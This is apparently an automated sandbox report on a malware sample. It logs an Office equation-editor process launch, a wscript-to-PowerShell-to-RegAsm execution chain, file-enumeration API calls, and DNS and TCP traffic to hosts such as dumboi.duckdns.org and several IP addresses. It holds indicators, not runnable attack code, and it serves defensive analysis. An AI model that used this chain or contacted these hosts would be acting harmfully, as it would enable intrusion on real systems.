                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: raw.githubusercontent.com
                    Source: global trafficDNS query: name: dumboi.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
